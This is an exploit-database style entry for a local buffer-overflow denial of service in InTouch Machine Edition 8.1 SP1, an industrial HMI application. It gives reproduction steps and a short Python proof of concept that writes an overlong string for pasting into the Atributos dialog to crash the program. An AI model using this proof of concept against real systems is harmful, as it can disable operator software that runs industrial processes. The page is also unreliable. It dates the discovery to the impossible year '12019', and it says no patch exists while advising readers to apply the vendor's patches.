Vendor: InTouch Machine Edition
By: chuyreds
CVSS: 7.5 (HIGH)
Type: Denial of Service (DoS) Local
Product Name: InTouch Machine Edition
Affected Version From: 8.1 SP1
Affected Version To: 8.1 SP1
Patch Exists: NO
Platforms Tested: Windows 10 Pro x64 es
12019

InTouch Machine Edition 8.1 SP1 – ‘Atributos’ Denial of Service (PoC)

The proof of concept causes a local denial of service (DoS) in InTouch Machine Edition 8.1 SP1. Pasting a specially crafted input (the PoC uses a string of 1026 "A" characters) into the "No Redibujar"/"Deshabilitados" field of the Atributos dialog triggers a buffer overflow, and the software crashes and becomes unresponsive.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the latest patches and updates provided by the vendor. Additionally, it is advised to restrict access to the affected software to trusted users only.

Exploit-DB raw data:

# Exploit Title: InTouch Machine Edition 8.1 SP1 - 'Atributos' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 12019-11-16
# Vendor Homepage: https://on.wonderware.com/
# Software Link : https://on.wonderware.com/intouch-machine-edition
# Tested Version: 8.1 SP1
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
# InTouch Machine Edition 8.1 SP1.py


# Steps to Produce the Local Buffer Overflow (SEH Unicode):
# 1.- Run python code: InTouch_Machine_Edition_8.1.py
# 2.- Open InTouch_Machine_Edition_8.1.txt and copy content to clipboard
# 3.- Open ITME v8.1 InTouch Machine Edition
# 4.- On Graficos select Atributos
# 5.- Paste ClipBoard on "No Redibujar"/"Deshabilitados" and click on "Aceptar"
#!/usr/bin/env python


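# 1026 "A" characters: the overlong string that is pasted into the dialog field
buffer = "\x41" * 1026
# Write the string to a text file so it can be copied to the clipboard
with open("InTouch_Machine_Edition_8.1.txt", "w") as f:
    f.write(buffer)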